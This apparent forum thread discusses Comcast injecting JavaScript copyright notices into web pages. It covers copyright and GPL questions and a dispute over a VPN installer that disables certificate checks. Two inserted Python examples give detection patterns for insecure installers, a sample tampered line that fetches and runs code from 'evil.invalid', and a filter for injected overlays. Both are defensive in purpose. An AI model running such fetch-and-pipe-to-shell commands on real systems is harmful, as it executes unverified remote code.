The header and people's reactions make it seem Comcast will just do this on a whim, as if it's inspecting the page you visit and deciding on the page to display the warning or not. If you read the screenshot, it's just a notice that someone filed a complaint against your IP, and Comcast is alerting you via email, maybe phone, maybe even a letter, and now your web browser. One might argue whether it's better they redirect you to a Comcast Message Page on their own domain one time. One might argue that this is a "feature" on the level of Comcast DNS servers that "helpfully" forward your bad domains to a search engine instead of giving a proper server not found response.
Don't want to receive these messages from Comcast? Don't seed your torrents.
This is correct. It is only performed after you are sent emails, letters, phone calls, etc. We do the same for when you are about to exceed your 300GB of data. Most people don't give us a good email, don't login to check it, don't login to their comcast account, etc... This type of notification is to cover those people. We are working on better ways to do this, see: https://www.caida.org/workshops/aims/1503/slides/aims1503_ba...
Alternatively, your company could choose not to act as a copyright cop.
Edit: Actually, reading the IETF link you posted, notifying users of a potential malware infection might be an example of how to use this technology in a non-shitty manner.
These companies aren't necessarily choosing to be copyright cops. I can't imagine that sounds very fun or beneficial to them. Systems were negotiated under legal pressure from the RIAA and MPAA.
Of course, Time Warner and Comcast are both also content creators, so they might have some motivation to concede.
Yes, when I wrote custom page tracking software for a custom forum I wrote and hosted, I was parsing out User-Agent information and would actually notice malware browser add-ons, and I'd gently post a notice at the top of my web page alerting them that they might want to run some malware scans. Security vs. privacy right there. That was a long time ago, and I don't track anything any more, but it was an interesting experiment.
Perhaps a captive portal and redirect would be a "nicer" way of doing this. At a bare minimum, it's less intrusive, and it's an accepted practice when using a provider's internet (especially wireless). Injecting JS into a page that I've requested from a third party server would erase my trust in that provider, and I would immediately cancel my service the first time my provider performed that action.
Internet Services engineering, mainly working on measurement, instrumentation, and customer experience. My group runs our Speed Test, SpeedExperience, Next-gen access trials, our RIPE Atlas probes/anchors, etc..
Whichever team is behind the account system needs work. Why do I have four Comcast accounts? I've only even lived at three different places. Why can I still log in and "pay my bill" which still says I owe "$39.99" on my last account? I was paying into it accidentally for months before they killed my new service because I wasn't paying into the new account.
It seems to me it's just hacks on top of hacks written by hacks.
Yes! This happened to me too! I moved to a new house, they configured service and "transferred" my account.
Three months later, my service at the new house is disconnected for non-payment. I look at my bank statement - sure enough, AutoPay happily withdrawing the amount...
... and applying it to the old house's (disconnected) cable, the account for which is now several hundred dollars in "credit" (paying $200/mo for business service).
It was (relatively) easy to get resolved, thanks largely I think to the business support folks. But still... :|
Maybe try a certified letter first? Also, they don't require YOU to ack, they require SOMEONE to ack, as I don't see anywhere where they actually have the "acker" verify that they are the account holder. I wonder if there is a legal loophole that the account holder could use as they can't prove that the account holder is the one that acked.
This comment is the only real explanation of what's going on here. I'm not sure why it's buried. It seems people are just reading the headline and breaking out the pitchforks and torches. I understand the issues of privacy here, but it also seems the context in which this is taking place is an important thing to consider, as well.
I think this is actually illegal. If you own the copyright for your content and they inject into it, they are creating a derived work without your permission.
I would hope not, because by a similar argument adblockers and userscripts would also be illegal. I don't agree with what Comcast is doing, but using this argument could end up with an even worse slippery slope that leads to users not being able to consume content/customise their computing environment in the way they choose to. On the other hand, if Comcast is your ISP, all your traffic does pass through equipment owned by Comcast, which --- if you believe in being able to have control over your devices --- they should likewise also have the right to control. All the traffic on my home network goes through an adblocking proxy, and I could do things like http://www.ex-parrot.com/pete/upside-down-ternet.html if I really wanted to. I certainly do want to maintain control over the traffic within my network.
That happens at the user's choice at the user's machine, and isn't being distributed any further. The ISP distributes this modified content to their "customers".
There may also be an interpretation in which you're not even modifying the work by using an adblocker.
If you define the work as the source code you're not actually modifying it. You're just declining to download subsequent works (iframes, flash, whatever).
At least in the United States (and the UK), the copyright owner of the original work has the exclusive right to prepare derivative works, regardless of whether the derivative work is published, distributed or used in any other way.
"De minimis" (minimal) changes won't create a derivative work. What counts as "de minimis" has been debated extensively, but sales stickers certainly do.
Creating derivative work is only illegal if you do it without permission from the copyright owner of the original work.
I don't know what you mean by "doesn't seem very valid". It is the law [1].
Annotations normally create a derivative work. That being said, annotations often end up being covered by fair usage (fair dealing in the UK).
>I don't know what you mean by "doesn't seem very valid". It is the law
Apparently it's not the law, as the link doesn't contain the words "distributed or used in any other way" or anything to the effect of "any other way".
Plus, the "de minimis" thing and fair use exceptions mentioned in your second comment, already scale down the absolute "any other way" qualifier.
I think you may be misunderstanding something. The owner of the copyright has exclusive rights to prepare derivative works (or authorise someone else to do so). There are certain exceptions. What's unclear about this?
Maybe "used in any other way" confuses you? It's standard legal language and it means publishing, public performance, creating mechanical copies, etc. The possible uses of a copyrighted work are numerous and due to advances in technology that list grows constantly. This expression makes it unnecessary to list every known possible use, or yet-to-be-discovered future uses.
>I think you may be misunderstanding something. The owner of the copyright has exclusive rights to prepare derivative works (or authorise someone else to do so). There are certain exceptions. What's unclear about this?
The fact that "certain exceptions" weren't mentioned in the first comment. I quote: "the copyright owner of the original work has the exclusive right to prepare derivative works, regardless of whether the derivative work is published, distributed or used in any other way."
There was no reference to "certain exceptions", "fair use" and the possibility of "minimal" (and thus allowed) changes.
That, plus the use of "used in any other way" (a "standard legal language" as you say) as part of a casual language comment, left the impression to the reader that only the copyright owner or someone with permission from them can create derivative works, period.
So while this is cleared up now after the extra explanations, the initial comment was quite unclear.
>I would hope not, because by a similar argument adblockers and userscripts would also be illegal.
Does not follow. Ad block is set up by the user to block connections. Your work doesn't change; the user just doesn't see the full work. Kinda like if I gave you glasses that blocked the color red and then you went and looked at an art gallery wearing them. The art hasn't changed, but the item I gave you, which you willingly wore, just stops some part of the art from being displayed to your eye.
I don't think you understood the post (admittedly the title is unclear).
If the title were "Comcast injects ... to show notices of reported copyright infringement against their account," there would probably be less confusion in the comments here.
I'm sure a content publisher could argue that by stating that the transport layer does not transform the content, that any such transformation (that the end user perceives) constitutes harm to them.
Such is law. That header gives them a basis for constructing this argument.
To use a sample you have to get a license from the original artist:
>Today, most mainstream acts obtain prior authorization to use samples, a process known as "clearing" (gaining permission to use the sample and, usually, paying an up-front fee and/or a cut of the royalties to the original artist). Independent bands, lacking the funds and legal assistance to clear samples, are at a disadvantage - unless they seek the services of a professional sample replay company or producer.
It doesn't. Sampling is technically illegal. However the bootleg market is often too small to get noticed and larger artists get authorisation before sampling (or at the very least - releasing).
You do often see some artists turn a blind eye to sampling though. Particularly dance artists, because many of them know their entire genre exists off the back of sampling. So it would be counterproductive / hypocritical for them to chase after royalties.
Sample clearance is generally not required if:
- You are just using the sampled music at home.
- You are using the sample in live shows. This is because, usually, you are not making copies and the owner of the venue pays the blanket license fees to performing rights organizations such as Broadcast Music Incorporated (BMI) or American Society of Composers, Authors, and Publishers (ASCAP).
- You plan to distribute copies to the public but meet one of the following: (1) an average listener would not notice the similarities between your end product and the sample, or (2) your use of the sample falls under the "fair use" doctrine. For more information on these, see "Defending a Lack of Sample Clearance," below.
The `checkBrowser` function says it is from brainjar.com and used under their terms of service. On the brainjar.com terms of service, it seems to say the code is licensed under the GPLv2+.
Doesn't this make the Comcast script now under the GPL - since GPL code can only be included in compatibly licensed products. Or is Comcast violating the GPL?
This is a crappy move on Comcast's part, but as far as GPL they most likely are not in violation. You can use GPL code in a commercial product as long as you are not distributing it.
If they ever choose to sell or distribute their "content injection system" though, they would have to release it under the GPL or else negotiate another license from the copyright owner.
How are they not distributing it if they send this JavaScript to each user notified? Of course it's JavaScript so maybe that counts as distributing the source...
AGPL fixes this problem for backend code running on the web server, which is technically not distributed, so GPLv2 does not apply. For Javascript code, the code is distributed to the web browser, so even GPLv2 applies.
If the `checkBrowser` function uses GPL'd code, then anything that calls `checkBrowser` in turn must be licensed under the GPL.
But that doesn't mean that this Comcast code _is_ licensed under the GPL. That means that the copyright owner (brainjar) can take action against Comcast, and tell them to either stop using their code, or change the license.
If Brainjar had licensed this code AGPL then Comcast would have to release their code. But since it's GPL 2 then they have no legal right to require Comcast or anybody else to stop using their code. That's one of the great things about GPL (or horrible things, depending on your intention)
Read up on your licenses folks, make sure your code is used the way you intend.
Always using a VPN has really made using the Internet a lot nicer place. I can use any Wifi without any fears, don't have to care about ISPs doing funny things with my traffic, and if I get country-blocked content I can just quickly route my traffic to another exit node.
Of course then the VPN provider is the single point of failure, but if it's trustworthy enough only folks with proper court orders should have access to my traffic. And it's an extra ten bucks per month or so.
"Streisand sets up a new server running L2TP/IPsec, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge. It also generates custom configuration instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists."
On the other hand, while your VPN or VPS provider may be no more trustworthy than your local ISP, it's _much_ easier to switch VPN providers - and you can arrange to have them in a different jurisdiction as well - If my net connection is through a proxy server in the Netherlands run by a company from Germany in a datacentre owned by a Japanese firm and I'm in Australia browsing websites in the US - there's a lot of legal hoopjumping needed to get to me.
I know I'm being unfairly picky when I should be thanking you for building a helpful install script; but your install instructions seem very counterintuitive given the privacy argument of running a VPN:
Aside from the lack of https scheme in the URL, you're also deliberately disabling the certificate authentication and then directly running the output into bash.
Granted the double ampersand offers some protection, sadly it's still little better than the often criticized:
curl http://example.com/install.sh | bash
Plus the address you supplied is a shortened URL so the user has to trust that the file it redirects to is the same Github hosted file that's in the referenced repo.
I do appreciate the work you've done. But given the security and privacy expectations of VPN, it might be worth having a little more transparency in your install instructions - even if that means splitting your instructions into 2 lines.
> given the security and privacy expectations of VPN
The security and privacy expectations are that the network for the server is not compromised. If that's not the case, why would you want the VPN hosted there in the first place?
You cannot control what happens beyond your own hosted infrastructure. Even the most trusted networks are still at the mercy of external DNS servers, web servers and routing equipment. Hence the entire point of trusted signed certificates.
Just because a person's hosted VPS might be trusted, it doesn't mean that:
1. The git.io redirects to the expected location. Anyone could clone your git repo then put a malicious script in a different shortened URL
2. Nor that someone couldn't MITM between the user and the git.io
3. Nor similar MITM attacks between git.io and github
Security is only as good as the strength of your weakest link.
Not if you're running HTTPS you're not. You cannot have code injected into a HTTPS connection like you could with plain text HTTP. And even in the worst case scenario where the entire connection is re-routed to a rogue server: you would get a nice big warning that your connection isn't secure and the download would fail. Thus again preventing the malicious code from running on the user's VPS.
You're also still ignoring my first point as well.
I really don't get your careless stance here. Github already comes with an SSL cert and you don't actually need a URL shortener for the type of link you're publishing. So all of these complaints people are making are so very easy to solve. But instead you are intentionally following bad practices. Frankly, if this is your attitude towards security then I really don't think you're the sort of person who should be writing installers for VPN servers to begin with.
Yes, you are. If your adversary can MITM a datacenter, it's likely that a rogue cert can also be obtained from a trusted CA. If your threat model includes this kind of adversary, please don't use my script. You should also consider how funny it would be to host a VPN and route your traffic like this in a network which you don't trust.
> You're also still ignoring my first point as well.
What would an adversary accomplish pointing a DIFFERENT short URL to a malicious script? I don't understand. I'm only using/listing git.io/vpn, so whatever someone does with other URLs is not my problem. There is some fork using git.io/ovpn for example.
> I really don't get your careless stance here.
I'm not careless. You can either run the one-liner which clearly states --no-check-certificate or download and examine the script as long as you want. The choice is on you.
> Github already comes with an SSL cert
But minimal distro images don't come with trusted CA certificates, so it's useless. Yes, I could install them. No, I don't want to.
> Yes, you are. If your adversary can MITM a datacenter, it's likely that a rogue cert can also be obtained from a trusted CA.
One cannot simply obtain a cert from a trusted CA. Hence how they become signing authorities. Granted it's not impossible to do, but it is very difficult. Certainly a far better assurance than not running HTTPS at all.
> If your threat model includes this kind of adversary, please don't use my script. You should also consider how funny would be to host a VPN and route your traffic like this in a network which you don't trust.
We're not talking local network here - literally nobody can trust the internet. Hence why CAs exist in the first place. This isn't some weird edge case threat model, this is something that's well known and already handled. And it's something that is already supported by Github but you are intentionally breaking.
> What would an adversary accomplish pointing a DIFFERENT short URL to a malicious script?
Do you really need that answered for you?
1. Clone repo
2. Publish their own shortened malicious URL in cloned repo
3. ???
4. Profit
It's called "social engineering" and actually quite a common method of attack.
> I'm not careless.
Given this script is aimed at less-technical people, I'd say it's rather presumptuous to assume they'd even realise just how careless it is to run a script downloaded from an unverified source.
> But minimal distro images don't come with trusted CA certificates, so it's useless. Yes, I could install them. No, I don't want to.
That's an edge case. You can add a comment to disable the certs in that edge case - or better yet, instructions on how to install the CA certs.
Every excuse you make is really just a plea for your own laziness. "it's the user's responsibility" - no it's not, you're providing instructions for them thus it's your responsibility to get those instructions right. "they might not have CA installed", so add a footnote about installing that. I mean seriously dude, Github have already handed you the tools you need to secure the install - there's literally no good excuse for disabling them.
> One cannot simply obtain a cert from a trusted CA.
One can't simply MITM a datacenter.
> literally nobody can trust the internet. Hence why CA's exist
lol
> it's something that is already supported by Github but you are intentionally breaking
I'm not breaking anything. It is supported by GitHub but not by many of the client machines (by default).
> It's called "social engineering" and actually quite a comment method of attack.
I unfortunately can't fix user stupidity.
> That's an edge case.
That's when you've proved you have no idea about what my user base is. Minimal images are very common for OpenVZ templates.
Anyway, and to end this: you've already stated your points and I've given you my explanations. You can either accept them or not, but I don't want to waste more time on this - feel free to fork if you don't like it.
SSHing onto a Linux server in some secure datacentre doesn't magically mean that everything that server connects to outside of the datacentre is also going to be secure. I assume that you do actually understand how the internet works? :p
> I'm not breaking anything. It is supported by GitHub but not by many of the client machines (by default).
Of course you're breaking things. You're breaking the security of HTTPS by disabling cert checking. And you're breaking readability of your install code by using URL shorteners.
As for HTTPS not being supported by many of your client machines by default, it's so very easy to rectify:
$(which apt-get yum) install ca-certificates
This will work on Debian and its derivatives as well as the usual Redhat derivatives too. So that one line works on all your supported platforms. It really is that simple. :)
> I unfortunately can't fix user stupidity.
But you're forcing user stupidity by using stupid defaults. It's quite literally your fault that they're being stupid as you're recommending they do stupid things.
> That's when you've proved you have no idea about what my user base is. Minimal images are very common for OpenVZ templates.
I happen to run hosting as a side project and almost exclusively use OS containers for personal projects. So I'm well versed in these kinds of containers and the kind of users you're targeting. You're just making excuses for bad security practices.
> Anyway, and to end this: you've already stated your points and I've given you my explanations.
You've given excuses, not explanations. I've demonstrated how easy it is to work around the limitations you've put in place. You've just given lazy excuses as to why you couldn't be bothered.
The crux of the matter is when building gateways you should NEVER default to insecure settings like you are currently doing. Period.
> feel free to fork if you don't like it.
To be quite honest, it could benefit from a complete rewrite. The code is functional but messy, your OS detection could use a little fine tuning too. But the real problem is that there's more instances within your script of code getting pulled from the internet with certificate checking disabled, and that would also need to be fixed (but at least you're not using URL shorteners there).
Your intentions are noble, but sadly your execution is less so. Which is what happens when you never listen to advice. And looking at the comments on your repo, this has been an issue that has been raised a multitude of times before. So it's not just me being an elitist :)
But, I always feel a little annoyed when people complain about piping curl into bash. If you know enough to see the danger, you also know enough to avoid it. Just curl to a file and read it, or open the web page and read it. Take some responsibility.
I'm with you on the https and the short link, though.
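The "curl to a file and read it" advice above, made concrete. This is an added example written for this thread; it is not the VPN script author's code and does not reproduce the real installer. It audits a downloaded installer for the patterns argued about here (downloads with certificate checking disabled, plaintext HTTP, code piped straight into a shell, a URL shortener hiding the real destination) and checks the file against a SHA-256 digest pinned out of band, which is the one verification that does not need a CA bundle on a minimal image. The sample installer text, the `.invalid` host names and the shortener list are constructed for illustration.

```python
"""Audit an installer before running it (added example, not the script author's code)."""
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Assumption: a small illustrative list of shortener hosts; extend it for your environment.
URL_SHORTENERS = {"git.io", "bit.ly", "goo.gl", "t.co", "tinyurl.com"}

# Patterns that indicate the script fetches further code without TLS verification,
# or runs fetched code without anyone reading it first.
INSECURE_PATTERNS = [
    (re.compile(r"--no-check-certificate\b"),
     "wget with certificate verification disabled"),
    (re.compile(r"\bcurl\b[^|\n]*(?:\s-k\b|--insecure\b)"),
     "curl with certificate verification disabled"),
    (re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
     "remote content piped straight into a shell"),
    (re.compile(r"\bhttp://"),
     "plaintext HTTP download (no integrity or authenticity)"),
]


def check_download_url(url: str) -> list[str]:
    """Return the reasons a one-liner's download URL should not be trusted as-is."""
    parsed = urlparse(url)
    findings = []
    if parsed.scheme != "https":
        findings.append("not https: there is no certificate to verify at all")
    if parsed.hostname in URL_SHORTENERS:
        findings.append("URL shortener: the destination is hidden, can be repointed, "
                        "and a look-alike short link is cheap to publish")
    return findings


def audit_script(text: str) -> list[tuple[int, str]]:
    """Return (line number, reason) pairs for suspicious lines in a downloaded script.

    This mechanises the first read-through; it is a screen, not a substitute for
    actually reading the code.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.strip().startswith("#"):      # comments and the shebang line
            continue
        for pattern, reason in INSECURE_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, reason))
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_digest(data: bytes, pinned_sha256_hex: str) -> bool:
    """Check a downloaded file against a digest obtained out of band.

    A pinned digest does not depend on the client having a CA bundle, which is the
    objection raised against HTTPS on minimal images; it does depend on the digest
    itself having reached you over a channel you trust.
    """
    return hmac.compare_digest(sha256_hex(data), pinned_sha256_hex.lower())


# Constructed sample installer; not the real script.
SAMPLE_INSTALLER = b"""#!/bin/bash
# installer (constructed sample)
wget --no-check-certificate -O /tmp/easy-rsa.tgz https://example.invalid/easy-rsa.tgz
curl -sSL http://example.invalid/setup.sh | bash
echo done
"""


if __name__ == "__main__":
    for reason in check_download_url("https://git.io/vpn"):
        print("url:", reason)
    for lineno, reason in audit_script(SAMPLE_INSTALLER.decode()):
        print(f"line {lineno}: {reason}")

    # The digest the author would publish; assumed here to have arrived out of band.
    pinned = sha256_hex(SAMPLE_INSTALLER)
    tampered = SAMPLE_INSTALLER.replace(b"echo done", b"curl http://evil.invalid/x | sh")
    print("genuine verifies:", verify_digest(SAMPLE_INSTALLER, pinned))
    print("tampered verifies:", verify_digest(tampered, pinned))
```

The digest check only moves the trust problem: a digest fetched over the same unverified connection as the script proves nothing. Publish it somewhere the reader already trusts (a signed release page, a channel separate from the download), or install ca-certificates and let TLS do the work.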
Yeah, but at least there haven't been any (high-profile) abuses, yet. Meanwhile Verizon and now Comcast have been caught tampering with their customers' traffic, and those are probably just the well-publicized cases. Maybe I am just blissfully unaware of VPNs' shenanigans.
Cox injects HTML into your HTTP connections. I've received popups on pages saying they've spotted traffic from a botnet server over my connection, and that my computer may be infected. I talked to Cox support and they view it as a feature.
Even the $10/month Linode plan has 2TB of data transfer. If you use it as a VPN you'll have to halve that since you are using it as a conduit. You still get 1TB which is 3x the Comcast data limit. I say VPN everything.
I tried doing the same with my mobile but it either eats my battery alive or kills instant notifications. I HATE that tracking tag that mobile carriers are adding.
Linode only counts download towards the data transfer, so you can pump 2TB through, as they only count the data one time, as it's heading out of the VPS.
If anyone is interested, you can get TigerVPN lifetime for $30 (one connection slot) or find online (I found one on reddit) TorGuard 50% coupon for 2 years service, but 5 slots and more endpoints. I use both from UK, and Internet is clear over there.
What? VPN connection is encrypted and (hopefully) authenticated. You can't inject data into that stream. Or you can, and completely break the connection.
You just middleman the vpn authentication via wifi - by spoofing the wifi router you THINK you are connecting to, but it's not really because its just emulated with a stronger signal so your device thinks everything is fine.
If you try to do that, the VPN client will notice that the spoofed server isn't presenting a valid certificate or doesn't use a valid key, and refuse to connect. Same reason you can't "just" middleman an HTTPS connection.
Besides, there's no need to spoof. The point of the VPN connection is to protect against the wifi router (even the legitimate one!) reading the traffic. By spoofing, you're just replacing a dodgy wifi router with another dodgy router.
Programs running on your PC can do it because they have access to your certificate store, and can tell the system to trust their certificate.
Entities not in control of your PC can't MITM an HTTPS connection, barring a catastrophic bug. And it is catastrophic. If you have a way to do this, please tell everybody because it's going to be the next Heartbleed.
The entire point of HTTPS is to prevent stuff like you're describing. And it does work, for the most part. Bugs happen, but they get fixed as they're discovered. It's definitely not "extremely easy."
Please go read up on this stuff before speaking authoritatively:
That's only because the antivirus/firewall products have access to your machine and install a root certificate on them, or more likely, are just using a browser extension to rewrite the dom on the fly.
More succinctly, the phrase "man in the middle" kinda loses meaning when the man in question is your own computer.
I don't know about all VPN technologies, but OpenVPN does authentication with client and server certificates. Just spoofing the WiFi router is not going to let you spoof that.
Hm.. if I delete the element from the DOM without clicking the button (trivial if you use the inspector), does this imply I do not confirm that I've received the Copyright Alert?
Edit: Also, I'm sure most people will just click the button without reading anything.
you don't want to use the inspector- this popup probably hits you on every single page until you finally agree. Instead, use an adblocker to identify some unique element class, and it will be blocked every time.
You don't have to use Comcast. I sacrificed Comcast's speed and went with a local, privacy conscious DSL provider and I couldn't be happier. I'm getting about 6mbps with dual bonded phone lines. It's kind of pricey at $80 but it's worth it knowing I'm dealing with an honest business. In most areas there are alternatives and DSL is available everywhere, it's worth it even if it's a lot slower for the peace of mind. As long as you don't trade in one evil giant corp for another like AT&T or Verizon.
I don't think this is reflective of most consumers in the US. I have a family of four. I couldn't imagine the kids working on school work, watching Netflix, or gaming while I try to teach online all while on a WiFi router connected to DSL. While it may work for you, the fact of the matter is that it likely will not work for many, hence the reason Comcast can get away with this crap (well, that and the monopoly).
> I couldn't imagine the kids working on school work, watching Netflix, or gaming while I try to teach online all while on a WiFi router connected to DSL.
At 6mbps? Tons of consumers in the US get even less...
In a similar situation here, 4 adults in a household currently on DSL (Approx 10mbps down / 0.6mbps up, best available speeds on DSL here).
Between two TVs using Netflix (usually no more than one at a time, but frequently) and me playing online games the connection becomes about useless.
Ping times shoot up past 1000ms making online gaming impossible, downloads are obviously slow (and interfere with Netflix streaming), and there's frequent connection bugs (stalls for 2-5s seemingly randomly).
Only other "Real" choice is Comcast, but I'm very reluctant due to their behavior and potential of implementing low caps. (Not currently in WA state)
4G isn't an option because data caps, sat (Which I used previously where I lived before) has extremely high latency and low caps (Obviously no multiplayer gaming there either), and of course nobody wants to deal with dialup in 2015.
A cheaper and faster way would be to buy a small cloud server and install openvpn on it. Then get a nice router and configure it to send all your traffic through the vpn.
Really? The last place I lived had the option of Comcast or maybe Verizon DSL at 1.5Mbps. Verizon didn't know if they could provide service or not, thus the "maybe." And that was it. This was true when I moved out three years ago, and it's still true for the people living there today.
So, "You don't have to use Comcast"? Actually, some people do unless they're willing to give up broadband altogether.
Many people do. I can use comcast or go to satellite. DSL is not even an option as I'm too far away. Satellite is not a high speed option in my opinion.
I wonder what's in it for them? Sending an email should be enough to comply with DMCA. Are they paid by some copyright groups or just being a pushover?
I was thinking the same thing - a nontrivial effort has clearly been spent on implementing this, and it certainly would not be well-received by most if not all of its customers.
Is there a reason to believe such case would have a chance of succeeding? I thought DMCA clearly protects the ISP as long as they forward the complaints to the offending customer?
Cox Communications also injects js to display downtime messages and data usage alerts when nearing the upper limits of their now enforced data caps. Their response to a FCC complaint was essentially "it's convenient for our users"
The script is inlined, so blocking by origin seems not possible. You could write a greasemonkey script (is that still a thing?) or write an extension which removes the line
I think you could also insert a script in the document head that adds an event listener for beforescriptexecute that checks for and cancels execution of the comcast script. A website could do this themselves even.
Better yet, block the script if detected, then fire the acknowledgement.
It seems to me, as if they also do some magic to intercept requests to the currently visited page. They use a relative path url (SYS_URL) to poll for a state and to send the acknowledgement (functions checkBulletin() and sendAck()). From my understanding that would be a request to the current domain/visited page, right?
So they just intercept their 'own' magic url, but it bothers me somehow.
Can anybody confirm this? My uptime is far beyond reasonable.
Out of curiosity, I wanted to know what the maximum z-index is. The CSS 2.1 spec doesn't present this information, but it turns out to be 2147483647 (the maximum value for a 32-bit integer).
Now what does that z-index say about the JavaScript developer who chose it? "Fuck it, 999999 is enough." Man, what a tool.
Well it is a very high zIndex, which would force the element into plane 99999.
What it says about the developer though, is that he didn't bother reading up on, what is the highest value, but just chose a rather high value of 99999.
Hiding this is counterproductive; trivial as it may be, and this goes for everyone, please don't publish such an extension. People need to see this and get pissed off, complain to comcast, understand why https is needed.
This will only remove the message, but will not prevent the other unwanted stuff: Calling back to Comcast with a seemingly personalized token (in SYS_URL).
If i am not mistaken, they query every 5 sec (via checkBulletin()).
There was a link posted here not long ago that pointed out the proliferation of arbitration clauses in contracts and customer agreements. No doubt your agreement with Comcast has such a clause.
Is there an example of this in action Jarred? I'm on a Comcast connection right now (DSL was too slow). Looks like it has been happening for a while -- from 2013:
TimeWarner does this as well. I don't have proof, but when my roommate was torrenting stuff, no vpn, nothing, I had a notification like this pop up on a random web page. This kind of shit has got to stop.
I don't live in the US, but what are the countermeasures for exploits like this? Is there a local proxy that can strip this and similar js out, and would it be simple enough for non-expert users to deploy?
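The question about a local proxy that strips the injected notice, and the earlier suggestions to delete the overlay or block the script, as an added example; this is not Comcast's code and not from anyone in the thread. It is a response-body filter of the kind a local HTTP proxy would run: it parses the page, drops any fixed-position element whose z-index is at or above the threshold the thread mentions (99999), and drops any inline script that defines the polling functions the thread reports (checkBulletin and sendAck). The sample page, the element id and the endpoint path are constructed; only the behaviour being matched comes from the thread. It can only help on plain HTTP, which is the point made above: over HTTPS neither the ISP can inject nor the proxy can see.

```python
"""Strip an ISP-injected overlay and its polling script from an HTTP response body.

Added example, not Comcast's code. The markup below is constructed.
"""
from html.parser import HTMLParser
import re

VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "param", "source", "track", "wbr"}
Z_INDEX_RE = re.compile(r"z-index\s*:\s*(-?\d+)", re.I)
FIXED_RE = re.compile(r"position\s*:\s*fixed\b", re.I)


class InjectionScanner(HTMLParser):
    """Record the character ranges of elements that look injected."""

    def __init__(self, html, z_threshold, script_markers):
        super().__init__(convert_charrefs=False)
        self.html = html
        self.z_threshold = z_threshold
        self.script_markers = script_markers
        self.ranges = []     # (start, end) slices of html to delete
        self.stack = []      # open elements: [tag, start_index, suspicious, script_text]
        # getpos() reports (line, column); precompute line starts to get absolute indexes.
        self.line_starts = [0]
        for i, ch in enumerate(html):
            if ch == "\n":
                self.line_starts.append(i + 1)

    def _abs(self):
        lineno, offset = self.getpos()       # position of the tag being handled
        return self.line_starts[lineno - 1] + offset

    def handle_starttag(self, tag, attrs):
        if tag in VOID_ELEMENTS:             # <br>, <img>: never wrap content
            return
        style = dict(attrs).get("style") or ""
        z = Z_INDEX_RE.search(style)
        suspicious = bool(z and int(z.group(1)) >= self.z_threshold and FIXED_RE.search(style))
        self.stack.append([tag, self._abs(), suspicious, ""])

    def handle_startendtag(self, tag, attrs):
        pass                                 # <x/> has no content to track either

    def handle_data(self, data):
        if self.stack and self.stack[-1][0] == "script":
            self.stack[-1][3] += data        # collect the script body for marker matching

    def handle_endtag(self, tag):
        if not any(entry[0] == tag for entry in self.stack):
            return                           # stray end tag: ignore
        # Tolerate unclosed elements (<p>, <li>) by popping until the match.
        while self.stack:
            t, start, suspicious, script_text = self.stack.pop()
            if t != tag:
                continue
            if t == "script" and all(m in script_text for m in self.script_markers):
                suspicious = True
            if suspicious:
                end = self.html.index(">", self._abs()) + 1
                self.ranges.append((start, end))
            break


def strip_injected(html, z_threshold=99999, script_markers=("checkBulletin", "sendAck")):
    """Return (cleaned html, number of elements cut)."""
    scanner = InjectionScanner(html, z_threshold, script_markers)
    scanner.feed(html)
    scanner.close()
    out, pos, cut = [], 0, 0
    for start, end in sorted(scanner.ranges):
        if start >= pos:                     # skip ranges nested inside one already cut
            out.append(html[pos:start])
            pos = end
            cut += 1
    out.append(html[pos:])
    return "".join(out), cut


# Constructed sample page: the legitimate content plus an injected notice and poller.
SAMPLE_PAGE = """<html><head><title>Example page (constructed)</title>
<script>var site = "ok";</script></head>
<body>
<div id="content" style="position:relative;z-index:1"><p>Real page text<br>more</p></div>
<div id="isp-notice" style="position:fixed;top:0;left:0;z-index:999999;background:#fff">
  <p>Notice from your provider</p><button onclick="sendAck()">I acknowledge</button>
</div>
<script type="text/javascript">
var SYS_URL = "/isp-notice-endpoint/";  /* constructed path */
function checkBulletin() { /* poll SYS_URL */ }
function sendAck() { /* post to SYS_URL */ }
setInterval(checkBulletin, 5000);
</script>
</body></html>
"""

if __name__ == "__main__":
    cleaned, cut = strip_injected(SAMPLE_PAGE)
    print(f"removed {cut} injected elements")
    print(cleaned)
```

Two caveats from the thread apply. Cutting the script also cuts the acknowledgement it would send, so from the ISP's side the notice was never seen; commenters above report escalation to calls and throttling when notices go unacknowledged. And a filter like this needs an on-path view of the page, which only exists for plaintext HTTP; the durable fix is serving the site over HTTPS.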
Oh no. You get the browser notice, the email, the text message, and then finally two days later a phone call that will KEEP CALLING until you acknowledge it through a series of key pad press prompts.
I'm glad they're responding to negative public opinion in the only honorable way, driving themselves out of business. It's so rare to see a corporation with values.
I had a situation with our local ISP where they injected some banner on each page to let users know they were close to going over their bandwidth usage when they got to like 90%. I reached out to them and said this was essentially a man in the middle attack and that I didn't want messages injected. A week later they messaged me to say it had been removed.
I've been noticing an issue when getting bandwidth limit notifications. The same injection technique is also being used. When I attempted to filter out these messages, Comcast promptly reduced my internet speed to 1Mb. It took 3 calls over two days to realize that they were doing this as a reaction to my inability to receive the notices.
This might not be relevant to the topic (I don't use Comcast), but I'm curious how web elements are forced to be overlaid consistently across all websites; doesn't the existing css properties on the page affect the behaviour of the injected scripts?
It's done via the 'z-index' CSS property [0]. Essentially, the higher the z-index, the higher the priority of the element; a higher z-index will appear in front of a lower z-index.
This means Comcast is assembling the packets up to the application layer for deep inspection and injection, which slows down receipt of the packets because it must receive the full payload before processing, reassembling, and transmitting.
The root of this problem is that there is no "control channel" (or whatever you want to call it) from an ISP to its customers. Email doesn't work because ISPs don't always have the customer's address and email can get spam filtered. Paper mail is expensive and may not be read. Until someone defines and implements a protocol for this, ISPs are going to keep inventing weird kludges. I wonder if Hotspot 2.0 can be adapted for wired networks.
It's probably stupid, but I'll admit I haven't looked at my cable bill for well over a year. I have paperless billing, it auto charges to my credit card, I see that the amount is the same every month, and that's it. If they include any messages with the bill, I never see them. If they sent me something via snail mail I'd probably read it, unless I mistakenly thought it was junk mail and threw it out without looking at it.
The junk mail thing is their own doing. I missed two months of letters from our ISP saying the bill hadn't been processed because I threw them out, assuming it was yet another letter trying to sell me the service I already have.
